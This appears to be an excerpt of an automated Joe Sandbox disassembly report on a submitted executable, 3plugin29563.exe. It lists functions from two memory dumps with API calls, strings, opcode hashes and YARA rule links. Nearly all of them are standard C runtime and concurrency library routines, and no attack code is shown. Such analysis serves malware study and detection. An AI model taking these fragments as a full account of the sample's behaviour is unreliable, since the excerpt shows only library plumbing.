Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: closesocketconnectfreeaddrinfogetaddrinfosocket
String ID:
API String ID: 1398928706-0
Opcode ID: 8d26d52e27f59a9940d176dc6277702905274d877d24f366d012a8bd0182ee76
Instruction ID: 834a08e28f682f734522ac54ba34c604006dde502710f5fca535ba4be9da72b3
Opcode Fuzzy Hash: 8d26d52e27f59a9940d176dc6277702905274d877d24f366d012a8bd0182ee76
Instruction Fuzzy Hash: E8218B71D083145BEB249B91DC49BDE7368DF14305F1001BFF909A62C1D6BDAD848F5A

Function 0213756B Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 021375B7
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 021375F9
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 02137615
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 02137620
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02137647

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID:
API String ID: 3897347962-0
Opcode ID: c9bcc653dc57cc8557a221489ebf6a882272b6724b07de11919b806ce84109fb
Instruction ID: bcc405a9a11182c18ea403c4fea2bac1d62e93129bb4c052fe5693c9f2b8fd85
Opcode Fuzzy Hash: c9bcc653dc57cc8557a221489ebf6a882272b6724b07de11919b806ce84109fb
Instruction Fuzzy Hash: D82185B4A40309EFDF05EF69C495AADB7B6BF09304F1040A9E805A7391DB30AE05CF90

Function 0043EF6A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043EF82

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 0043EF94
_free.LIBCMT ref: 0043EFA6
_free.LIBCMT ref: 0043EFB8
_free.LIBCMT ref: 0043EFCA

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: 6b521f363db5f00c334227b762db73b0ea04d4178acdc4681139e64b086e54cc
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: B0F044325456047B9524EB56EA81C0777FAEA4831AF54281EF048D7A84C7BCFC50865D

Function 0214F1D1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0214F1E9

Part of subcall function 0214AF8C: HeapFree.KERNEL32(00000000,00000000,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?), ref: 0214AFA2
Part of subcall function 0214AF8C: GetLastError.KERNEL32(?,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?,?), ref: 0214AFB4

_free.LIBCMT ref: 0214F1FB
_free.LIBCMT ref: 0214F20D
_free.LIBCMT ref: 0214F21F
_free.LIBCMT ref: 0214F231

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: 749bfc59228c668066f19f9a4fffa628f6908963dcb7c96886702218e0fc53f0
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: 14F096B35C8610BF8624EB64F691C1B73DAEF007157550909F44CD7A10EF74F882CA94

Function 00402670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402806
___std_exception_destroy.LIBVCRUNTIME ref: 004028A0

Strings

P#@, xrefs: 004027BE, 00402899
P#@, xrefs: 00402811

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#@$P#@
API String ID: 2970364248-3974838576
Opcode ID: 7fc1a7f459412db0873a4a0ca5a9249ec0bccde9819b9006d7127736c11dc2b9
Instruction ID: 621a5324c1990eb49072827d514ee072234b508546a45b831640ce9d6ee5fe91
Opcode Fuzzy Hash: 7fc1a7f459412db0873a4a0ca5a9249ec0bccde9819b9006d7127736c11dc2b9
Instruction Fuzzy Hash: FD717371D002089BDB05DF98C985BDDFBB5EF59314F14822EE805B7381D778A984CBA9

Function 0043D94E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043DAE8

Strings

*?, xrefs: 0043D991

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 8362f50ee7a0c99abd3a2154eed41d243f49012955aee066503b94f7d3a93432
Instruction ID: 814e94d145bf4f08a7ec43ac2aa167b48880a0de0c74ec22b05a4d4dca91387d
Opcode Fuzzy Hash: 8362f50ee7a0c99abd3a2154eed41d243f49012955aee066503b94f7d3a93432
Instruction Fuzzy Hash: 9B617CB1E002199FDB14DFA9D8815EEFBF5EF4C314F24916AE845E7300D639AE418B94

Function 0214DBB5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214DD4F

Strings

*?, xrefs: 0214DBF8

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 8362f50ee7a0c99abd3a2154eed41d243f49012955aee066503b94f7d3a93432
Instruction ID: a4b9bc0dd793e91481a0b72e16ad54617a40b49ef296ad0c43c71bc4f60ad273
Opcode Fuzzy Hash: 8362f50ee7a0c99abd3a2154eed41d243f49012955aee066503b94f7d3a93432
Instruction Fuzzy Hash: EF614CB5D40219AFCF14DFA8D8805EDFBF5EF49310B2581AAD819E7340EB71AE418B90

Function 00442622 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044268C
_free.LIBCMT ref: 0044267A

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 00442846

Strings

E(D, xrefs: 00442635, 00442750, 0044263B

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: E(D
API String ID: 2155170405-2784804122
Opcode ID: 3f3760002a74bcd632fa05c6f7018d6c020e516b8c8f5926dcac9eb964288e9a
Instruction ID: 522402505c5bfa044af04196535c13d1f65720787a9ee6b81a006049149adbff
Opcode Fuzzy Hash: 3f3760002a74bcd632fa05c6f7018d6c020e516b8c8f5926dcac9eb964288e9a
Instruction Fuzzy Hash: 1B51FB71900209ABEB10EF66DD819AEB7B8EF44314F51026FF514A3291EBF89D41CB5D

Function 00438F4A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

p'w, xrefs: 00438F9B
C:\Users\user\Desktop\3plugin29563.exe, xrefs: 00438F8D, 00438FCA

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\3plugin29563.exe$p'w
API String ID: 0-1554357703
Opcode ID: 1819a519338603fc7a3a4cafba9d2478ec600322c93fbf645a545271b830ca02
Instruction ID: 1968c64a859c706df8857efbecc9bc449de46b63213ee7af0f361dfd0a3d374e
Opcode Fuzzy Hash: 1819a519338603fc7a3a4cafba9d2478ec600322c93fbf645a545271b830ca02
Instruction Fuzzy Hash: 0541C371A00218AFDB259B9ADC8199EBBB9EB8D314F10506FF40197341E7B89E41CB59

Function 021491B1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\3plugin29563.exe, xrefs: 021491F4, 02149231
p'w, xrefs: 02149202

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\3plugin29563.exe$p'w
API String ID: 0-1554357703
Opcode ID: 1819a519338603fc7a3a4cafba9d2478ec600322c93fbf645a545271b830ca02
Instruction ID: cdb679e02503b0ecf93b26ab50ab7379ee7eeb38a641f99e57c399f4a4888bc6
Opcode Fuzzy Hash: 1819a519338603fc7a3a4cafba9d2478ec600322c93fbf645a545271b830ca02
Instruction Fuzzy Hash: 0B418571A80614AFDB15DFD9DC84D9FBBF9EF85710F140166E809E7250EBB08A40CB54

Function 004355FB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00435620
CatchIt.LIBVCRUNTIME ref: 00435706

Strings

RCC, xrefs: 0043563A
MOC, xrefs: 00435632

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
Instruction ID: 40c08b3c9c7ed7c85293fd6626c5c57671c4a543d55d2bd8bc945e32ced6a602
Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
Instruction Fuzzy Hash: 88415971900609EFDF15DF94CD82AEEBBB5FF4C304F18505AF91866211D3399A50DB58

Function 02145862 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02145887
CatchIt.LIBVCRUNTIME ref: 0214596D

Strings

RCC, xrefs: 021458A1
MOC, xrefs: 02145899

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
Instruction ID: 9442652ee828fd97a8f6cfb30bb32a6e63c080fb4393ae9ce7afb5d37bb9fb63
Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
Instruction Fuzzy Hash: 8F41887194020AFFCF16CF94CC80AAEBBB6BF58314F5881A9F918A7221DB359950CF50

Function 00403A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

__Mtx_destroy_in_situ.LIBCPMT ref: 00403B53
__Cnd_destroy_in_situ.LIBCPMT ref: 00403B59
__Mtx_destroy_in_situ.LIBCPMT ref: 00403B62

Strings

pB@, xrefs: 00403AAE

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
String ID: pB@
API String ID: 3308344742-522444117
Opcode ID: 2f0a09e56f0b18211ae93ab67e086117d81d7692f7bd6ba719ec68d9dba43827
Instruction ID: eddc33a482710ae55d278ed169681849d88ed2a90e8b816b8b1b34bba71269c5
Opcode Fuzzy Hash: 2f0a09e56f0b18211ae93ab67e086117d81d7692f7bd6ba719ec68d9dba43827
Instruction Fuzzy Hash: B231B471600A009FD724DF29C889B66BBE9EF44729F04466EE956DB391DB3CED00CB94

Function 0042AE05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0042AE8A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042AEAF
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042AEEE

Strings

pExecutionResource, xrefs: 0042AEA7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 8971683dbae54e37c12da790fdc4c14c40c78a3f51c37b9e2796979feadbec54
Instruction ID: 277289b3af260c92f9d310b34a7f8e0edfcbe98a24aa7e9bc3cd98f1fb0e55b7
Opcode Fuzzy Hash: 8971683dbae54e37c12da790fdc4c14c40c78a3f51c37b9e2796979feadbec54
Instruction Fuzzy Hash: D221A775B402059BCB08EFA5C852BED77A5BF48304F10401FE90567381DBB8AE45CB99

Function 021529E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02152A57
_free.LIBCMT ref: 02152AAD

Part of subcall function 02152889: _free.LIBCMT ref: 021528E1
Part of subcall function 02152889: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021528F3

Strings

XgE, xrefs: 02152A10

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE
API String ID: 597776487-2984570469
Opcode ID: 13dff872d4da3940e7f7c2aad926b40bfead4e65e52a482af211b715217b11d5
Instruction ID: 31ff7f46f2714fab3b0bec6509eca4b88387ddf92e592749aba483855ed69154
Opcode Fuzzy Hash: 13dff872d4da3940e7f7c2aad926b40bfead4e65e52a482af211b715217b11d5
Instruction Fuzzy Hash: 37210B73940135EBEB35A7249D40AEF77A98F84364F1103E5EDB4A3190EFB04D85C991

Function 02130E63 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02130ED1
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 02130EDE
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 02130F31

Strings

@[F, xrefs: 02130ED6

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
String ID: @[F
API String ID: 220083066-1227568360
Opcode ID: e96e0449b761905d3e20a47db03eaa49534ecb05729d0eb96170e707f80b5347
Instruction ID: ef3e7ded29917f25c9be3f6695792c085d79dfa8cbda229af8d5fce1751fd6eb
Opcode Fuzzy Hash: e96e0449b761905d3e20a47db03eaa49534ecb05729d0eb96170e707f80b5347
Instruction Fuzzy Hash: 7301D871A897119FDB16FBF8645032D76E7AB0C710F51406EE405EB341DF748A058B9A

Function 0042A08E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A0A2
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A0C6
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A0D9

Strings

pScheduler, xrefs: 0042A0D1

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 3b0ef819b2f712a159a22c599e5e418dbec535767eebca4787d9e52e38b5f61f
Instruction ID: db3404021c9b453a332318ff192eee56eaec823d92bc0efffc062d04c8b945cf
Opcode Fuzzy Hash: 3b0ef819b2f712a159a22c599e5e418dbec535767eebca4787d9e52e38b5f61f
Instruction Fuzzy Hash: 89F02B3670021463C320FF51F84295EB3799F807157A0801FE90153243DF79AD05C69A

Function 00402AF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402B23

Strings

P#@, xrefs: 00402B2E
P#@, xrefs: 00402B18
This function cannot be called on a default constructed task, xrefs: 00402B03, 00402B1E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@$This function cannot be called on a default constructed task
API String ID: 2659868963-4211761357
Opcode ID: dcf084b1e8b94520093852c978a8bff85ca530dd58906b11bdcf70b5121adac5
Instruction ID: b5206e9487c5cb6c20cf3b3ee9072370f07aa9f2a381878faa967717a9d1ae2f
Opcode Fuzzy Hash: dcf084b1e8b94520093852c978a8bff85ca530dd58906b11bdcf70b5121adac5
Instruction Fuzzy Hash: 43F0A070D1020CABC714DFA89841A9EFBF8AF19305F1082AFFC4067201EBB45A58CB99

Function 0212D3A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(00465720), ref: 0212D3CF
WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0212D33F,00000064,?,0045007C,?,02117764,00468650), ref: 0212D3E0
RtlEnterCriticalSection.NTDLL(00465720), ref: 0212D3E7

Strings

WF, xrefs: 0212D3C9

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWait
String ID: WF
API String ID: 501323975-2907287748
Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
Instruction ID: bf22510a0681b83863d0f1ce5c2fafd8b2289ee515287c56a213025e4e2d85f6
Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
Instruction Fuzzy Hash: F9E01239541B24F7CB112B50FC48B8E3F18EB09753F054031F90596161D7655810CBEE

Function 0043B585 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(7jC,?,00436A37,?), ref: 0043B58D
GetLastError.KERNEL32(?,00436A37,?), ref: 0043B597
__dosmaperr.LIBCMT ref: 0043B59E

Strings

7jC, xrefs: 0043B58A

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID: 7jC
API String ID: 1545401867-2929899776
Opcode ID: 0fe41c23db017373336e0b2fce523f56b086464d840d91b097c58a6c50f64a30
Instruction ID: e9bccfd746da36f843baeb91ba7abb468b12073c9a40a0d6319ef90b21766e14
Opcode Fuzzy Hash: 0fe41c23db017373336e0b2fce523f56b086464d840d91b097c58a6c50f64a30
Instruction Fuzzy Hash: 97D02232108608378B002BF2BC089073F0CCA803397140622F07CC00E1DF3AD8808A88

Function 02117EA7 Relevance: 6.4, APIs: 4, Instructions: 388libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,00462014), ref: 02117F21
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02117F82
GetProcAddress.KERNEL32(00000000), ref: 02117F89
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0211804E

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleProcSystemVersion
String ID:
API String ID: 1456109104-0
Opcode ID: e7d3788c8dda92cd2511c4c600283647bb0029eb3f86137f6af6693677f995bc
Instruction ID: 9cd2fa62898959a538f63b9dde3d230597c1e2589e3e09d4ab238d008667ba06
Opcode Fuzzy Hash: e7d3788c8dda92cd2511c4c600283647bb0029eb3f86137f6af6693677f995bc
Instruction Fuzzy Hash: F4D1F770E40254AFEB15BB28CD4A79D7B73AB81314F5582ACD815A73C0EB764A948FC3

Function 0043CA20 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CAA7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 21e4cec6b7fdfb3eb64d368f6b521e8ac607c951dd97602f8ad71233296d3714
Instruction ID: 1993e3bc1e35a4ca9142e6cfe781145fb0807b3e986debb763c412fc433ec638
Opcode Fuzzy Hash: 21e4cec6b7fdfb3eb64d368f6b521e8ac607c951dd97602f8ad71233296d3714
Instruction Fuzzy Hash: 03B126329002559FEB15DF28C8C17AEBBE5EF59350F24A16BE845EB341D63C9D02CB68

Function 0214CC87 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0214CD0E

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 75912d319fd4d84a463179a52f4d0c7b8a22aeda22330244694e99d83a1ca41b
Instruction ID: 1bac9a12b3caefe7ed107e685e84a979e218aa684108e3994a28509daab744ca
Opcode Fuzzy Hash: 75912d319fd4d84a463179a52f4d0c7b8a22aeda22330244694e99d83a1ca41b
Instruction Fuzzy Hash: 24B126729422459FDB15CF28C8907EEBFE6EF45340F2541ABD859EB241DB398942CBE0

Function 00434FEE Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004350B5
___AdjustPointer.LIBCMT ref: 004350D8
___AdjustPointer.LIBCMT ref: 00435174

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c7068fd21dc23f91824685015276b7c30fe9a365bd672e5596a1ca80a441a0d6
Instruction ID: 4d181e2de5f4d32a2404113f54cd4ee91e2933e5089b039b3d6accc254201f0f
Opcode Fuzzy Hash: c7068fd21dc23f91824685015276b7c30fe9a365bd672e5596a1ca80a441a0d6
Instruction Fuzzy Hash: 6B510672A01A02AFDF299F15D841BBB77B4EF08305F14616FE80157291E739ED81CB98

Function 02145255 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0214531C
___AdjustPointer.LIBCMT ref: 0214533F
___AdjustPointer.LIBCMT ref: 021453DB

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e6df1cbf7e104fe9de3839c683bd27944cab602863a2b4ede0c4ef708695de88
Instruction ID: 77b9c4889187acacce9551b340cc6b98ed0b70e3a0c6109431f212b49c512892
Opcode Fuzzy Hash: e6df1cbf7e104fe9de3839c683bd27944cab602863a2b4ede0c4ef708695de88
Instruction Fuzzy Hash: 5251D571684206BFDB298F54C840B6A77A6FF20318F94452DED1A572A0EF71E950CB90

Function 004081F0 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,92861014), ref: 00408269
